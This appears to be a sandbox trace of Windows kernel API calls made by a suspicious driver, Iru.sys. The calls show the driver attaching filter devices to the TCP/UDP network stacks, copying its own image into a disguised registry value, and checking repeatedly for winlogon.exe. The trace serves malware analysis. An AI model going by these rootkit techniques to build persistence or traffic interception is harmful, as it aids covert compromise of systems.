| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x52, ret_val_ptr_out = 0xffffe0003af83fa0 | ||||
| _wcsicmp | _String1 = 87AAF9C345942AD56C43CA9DF7AC6D3E67D13B82, _String2 = ImagePath, ret_val_out = -49 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83fa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwClose | Handle_unk = 0xffffffff80000c04, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = \Device\Tcp, DestinationString_out = \Device\Tcp | ||||
| IoGetDeviceObjectPointer | ObjectName = \Device\Tcp, DesiredAccess_unk = 0x1f01ff, FileObject_unk_out = 0xfffff800fc55c030, DeviceObject_unk_out = 0xfffff800fc55c028, ret_val_out = 0x0 | ||||
| IoCreateDevice | DriverObject_unk = 0xffffe0003cbe3e60, DeviceExtensionSize = 0x0, DeviceName = \Device\Tcp1Fltnetfilter2, DeviceType_unk = 0x12, DeviceCharacteristics = 0x100, Exclusive = 0, DeviceObject_unk_out = 0xfffff800fc55c020, ret_val_out = 0x0 | ||||
| IoAttachDeviceToDeviceStack | SourceDevice_unk = 0xffffe0003c439c20, TargetDevice_unk = 0xffffe0004c9e7d00, ret_val_unk_out = 0xffffe0004c9e7d00 | ||||
| RtlInitUnicodeString | SourceString = \Device\Tcp6, DestinationString_out = \Device\Tcp6 | ||||
| IoGetDeviceObjectPointer | ObjectName = \Device\Tcp6, DesiredAccess_unk = 0x1f01ff, FileObject_unk_out = 0xfffff800fc55c048, DeviceObject_unk_out = 0xfffff800fc55c040, ret_val_out = 0x0 | ||||
| IoCreateDevice | DriverObject_unk = 0xffffe0003cbe3e60, DeviceExtensionSize = 0x0, DeviceName = \Device\Tcp61Fltnetfilter2, DeviceType_unk = 0x12, DeviceCharacteristics = 0x100, Exclusive = 0, DeviceObject_unk_out = 0xfffff800fc55c038, ret_val_out = 0x0 | ||||
| IoAttachDeviceToDeviceStack | SourceDevice_unk = 0xffffe0003ae8fe40, TargetDevice_unk = 0xffffe0004c9e7ae0, ret_val_unk_out = 0xffffe0004c9e7ae0 | ||||
| RtlInitUnicodeString | SourceString = \Device\Udp, DestinationString_out = \Device\Udp | ||||
| IoGetDeviceObjectPointer | ObjectName = \Device\Udp, DesiredAccess_unk = 0x1f01ff, FileObject_unk_out = 0xfffff800fc55c060, DeviceObject_unk_out = 0xfffff800fc55c058, ret_val_out = 0x0 | ||||
| IoCreateDevice | DriverObject_unk = 0xffffe0003cbe3e60, DeviceExtensionSize = 0x0, DeviceName = \Device\Udp1Fltnetfilter2, DeviceType_unk = 0x12, DeviceCharacteristics = 0x100, Exclusive = 0, DeviceObject_unk_out = 0xfffff800fc55c050, ret_val_out = 0x0 | ||||
| IoAttachDeviceToDeviceStack | SourceDevice_unk = 0xffffe0003ae849a0, TargetDevice_unk = 0xffffe0004c9e76b0, ret_val_unk_out = 0xffffe0004c9e76b0 | ||||
| RtlInitUnicodeString | SourceString = \Device\Udp6, DestinationString_out = \Device\Udp6 | ||||
| IoGetDeviceObjectPointer | ObjectName = \Device\Udp6, DesiredAccess_unk = 0x1f01ff, FileObject_unk_out = 0xfffff800fc55c078, DeviceObject_unk_out = 0xfffff800fc55c070, ret_val_out = 0x0 | ||||
| IoCreateDevice | DriverObject_unk = 0xffffe0003cbe3e60, DeviceExtensionSize = 0x0, DeviceName = \Device\Udp61Fltnetfilter2, DeviceType_unk = 0x12, DeviceCharacteristics = 0x100, Exclusive = 0, DeviceObject_unk_out = 0xfffff800fc55c068, ret_val_out = 0x0 | ||||
| IoAttachDeviceToDeviceStack | SourceDevice_unk = 0xffffe0003c697cd0, TargetDevice_unk = 0xffffe0004b328d00, ret_val_unk_out = 0xffffe0004b328d00 | ||||
| PsCreateSystemThread | DesiredAccess = 0x0, ObjectAttributes_unk = 0x0, ProcessHandle_unk = 0x0, StartRoutine_unk = 0xfffff800fc2ba230, StartContext_ptr = 0x0, ThreadHandle_ptr_out = 0xffffd00033d294d0, ThreadHandle_out = 0xffffffff80000c04, ClientId_unk_out = 0x0, ret_val_out = 0x0 | ||||
| ZwClose | Handle_unk = 0xffffffff80000c04, ret_val_out = 0x0 | ||||
| RtlInitUnicodeString | SourceString = \Registry\Machine\SYSTEM\ControlSet001\Control, DestinationString_out = \Registry\Machine\SYSTEM\ControlSet001\Control | ||||
| ZwOpenKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d293a0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Control, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd00033d29488, KeyHandle_out = 0xffffffff80000c04, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwClose | Handle_unk = 0xffffffff80000c04, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = \Registry\Machine\SYSTEM\ControlSet001\Control\NetTracepeb, DestinationString_out = \Registry\Machine\SYSTEM\ControlSet001\Control\NetTracepeb | ||||
| RtlInitUnicodeString | SourceString = {197EAD1F-1236-AFFC-192A-2108CED812BA}, DestinationString_out = {197EAD1F-1236-AFFC-192A-2108CED812BA} | ||||
| ZwOpenKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d293a0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Control\NetTracepeb, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd00033d29488, KeyHandle_out = 0x0, ret_val_out = 0xc0000034 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b8e43d00 | ||||
| ZwOpenKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d290e0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd00033d29370, KeyHandle_out = 0xffffffff80000c04, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = ImagePath, DestinationString_out = ImagePath | ||||
| ZwQueryValueKey | KeyHandle_unk = 0xffffffff80000c04, ValueName = ImagePath, KeyValueInformationClass_unk = 0x2, Length = 0x0, KeyValueInformation_ptr_out = 0x0, ResultLength_ptr_out = 0xffffd00033d29360, ret_val_out = 0xc0000023 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba05f4c0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba05f4c0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28a98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xaa, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba05f4c0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba05f4c0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28778, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa8, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba05f4c0, Length = 0xa8, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd00033d28778, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x60, ret_val_ptr_out = 0xffffc000b78f2d10 | ||||
| ZwQueryValueKey | KeyHandle_unk = 0xffffffff80000c04, ValueName = ImagePath, KeyValueInformationClass_unk = 0x2, Length = 0x60, KeyValueInformation_ptr_out = 0xffffc000b78f2d10, KeyValueInformation_deref_TitleIndex_out = 0x0, KeyValueInformation_deref_Type_out = 0x2, KeyValueInformation_deref_DataLength_out = 0x54, KeyValueInformation_deref_Data_out = \??\C:\Users\RDhJ0CNFevzX\Desktop\Iru.sys, ResultLength_ptr_out = 0xffffd00033d29360, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba05f4c0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba05f4c0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28a98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xaa, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba05f4c0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba05f4c0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28778, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa8, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba05f4c0, Length = 0xa8, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd00033d28778, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| wcsstr | _Str = \??\C:\Users\RDhJ0CNFevzX\Desktop\Iru.sys, _SubStr = \??\, ret_val_out = \??\C:\Users\RDhJ0CNFevzX\Desktop\Iru.sys | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000b78f2d10, Tag = 0x0 | ||||
| ZwCreateFile | DesiredAccess_unk = 0x10000000, ObjectAttributes_ptr = 0xffffd00033d290b0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \??\C:\Users\RDhJ0CNFevzX\Desktop\Iru.sys, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x80, ShareAccess = 0x0, CreateDisposition = 0x1, CreateOptions = 0x10, EaBuffer_ptr = 0x0, EaLength = 0x0, FileHandle_ptr_out = 0xffffd00033d29378, FileHandle_out = 0x0, IoStatusBlock_unk_out = 0xffffd00033d29110, ret_val_out = 0xc0000043 | ||||
| ZwClose | Handle_unk = 0x0, ret_val_out = 0xc0000008 | ||||
| ZwClose | Handle_unk = 0xffffd00033d29370, ret_val_out = 0xc0000008 | ||||
| ZwCreateFile | DesiredAccess_unk = 0x80000000, ObjectAttributes_ptr = 0xffffd00033d29318, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \??\C:\Users\RDhJ0CNFevzX\Desktop\Iru.sys, ObjectAttributes_deref_Attributes = 0x240, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x80, ShareAccess = 0x3, CreateDisposition = 0x1, CreateOptions = 0x60, EaBuffer_ptr = 0x0, EaLength = 0x0, FileHandle_ptr_out = 0xffffd00033d29360, FileHandle_out = 0xffffffff800010b0, IoStatusBlock_unk_out = 0xffffd00033d292f0, ret_val_out = 0x0 | ||||
| ZwQueryInformationFile | FileHandle_unk = 0xffffffff800010b0, Length = 0x18, FileInformationClass_unk = 0x5, IoStatusBlock_unk_out = 0xffffd00033d292f0, FileInformation_ptr_out = 0xffffd00033d29300, ret_val_out = 0x0 | ||||
| ZwClose | Handle_unk = 0xffffffff800010b0, ret_val_out = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x3af148, ret_val_ptr_out = 0xffffc000ba600000 | ||||
| ZwCreateFile | DesiredAccess_unk = 0x80000000, ObjectAttributes_ptr = 0xffffd00033d29318, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \??\C:\Users\RDhJ0CNFevzX\Desktop\Iru.sys, ObjectAttributes_deref_Attributes = 0x240, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x80, ShareAccess = 0x3, CreateDisposition = 0x1, CreateOptions = 0x60, EaBuffer_ptr = 0x0, EaLength = 0x0, FileHandle_ptr_out = 0xffffd00033d29368, FileHandle_out = 0xffffffff80000aa0, IoStatusBlock_unk_out = 0xffffd00033d29308, ret_val_out = 0x0 | ||||
| ZwReadFile | FileHandle_unk = 0xffffffff80000aa0, Event_unk = 0x0, UserApcRoutine_unk = 0x0, UserApcContext_ptr = 0x0, BufferLength = 0x3af148, ByteOffset_ptr = 0xffffd00033d29300, ByteOffset = 0, Key_ptr = 0x0, IoStatusBlock_unk_out = 0xffffd00033d29308, Buffer_ptr_out = 0xffffc000ba600000, Buffer_deref_data_out = BINARY(offset=9598025,skipped=1,size=0), ret_val_out = 0x0 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| ZwCreateKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d293a0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Control\NetTracepeb, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, TitleIndex = 0x0, Class_ptr = 0x0, CreateOptions = 0x0, KeyHandle_ptr_out = 0xffffd00033d29490, KeyHandle_out = 0xffffffff80000aa0, Disposition_ptr_out = 0xffffd00033d29488, Disposition_out = 0x1, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000aa0, ValueName = {197EAD1F-1236-AFFC-192A-2108CED812BA}, TitleIndex = 0x0, Type = 0x3, Data_ptr = 0xffffc000ba600000, Data_deref_data = BINARY(offset=13648430,skipped=1,size=0), DataSize = 0x3af148, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba2cba50, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2cba50, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28ed8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x88, ret_val_ptr_out = 0xffffe0003af95ec0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba2cba50, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2cba50, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28bb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x86, ret_val_ptr_out = 0xffffe0003a763d70 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2cba50, Length = 0x86, ObjectNameInfo_unk_out = 0xffffe0003a763d70, ReturnLength_ptr_out = 0xffffd00033d28bb8, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NetTracepeb, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NetTracepeb | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763d70, Tag = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x4e, ret_val_ptr_out = 0xffffe0003af89ea0 | ||||
| _wcsicmp | _String1 = {197EAD1F-1236-AFFC-192A-2108CED812BA}, _String2 = ImagePath, ret_val_out = 18 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95ec0, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89ea0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwFlushKey | KeyHandle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffc000ba600000, Tag = 0x0 | ||||
| RtlFreeAnsiString | AnsiString = \ | ||||
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00033d29488, Interval = -1000000, ret_val_out = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000ba025e50 | ||||
| ZwOpenKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d28d20, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fb0, KeyHandle_out = 0xffffffff80001020, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = ImagePath, DestinationString_out = ImagePath | ||||
| ZwQueryValueKey | KeyHandle_unk = 0xffffffff80001020, ValueName = ImagePath, KeyValueInformationClass_unk = 0x2, Length = 0x0, KeyValueInformation_ptr_out = 0x0, ResultLength_ptr_out = 0xffffd00033d28fa0, ret_val_out = 0xc0000023 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba2cba50, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2cba50, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d286d8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xaa, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba2cba50, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2cba50, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d283b8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa8, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2cba50, Length = 0xa8, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd00033d283b8, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4UonVc8lOEt4AL4JQLxQ8QpV1vO | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x60, ret_val_ptr_out = 0xffffc000b9ae4310 | ||||
| ZwQueryValueKey | KeyHandle_unk = 0xffffffff80001020, ValueName = ImagePath, KeyValueInformationClass_unk = 0x2, Length = 0x60, KeyValueInformation_ptr_out = 0xffffc000b9ae4310, KeyValueInformation_deref_TitleIndex_out = 0x0, KeyValueInformation_deref_Type_out = 0x2, KeyValueInformation_deref_DataLength_out = 0x54, KeyValueInformation_deref_Data_out = \??\C:\Users\RDhJ0CNFevzX\Desktop\Iru.sys, ResultLength_ptr_out = 0xffffd00033d28fa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba2cba50, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2cba50, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d286d8, ret_val_out = 0xc0000004 | ||||
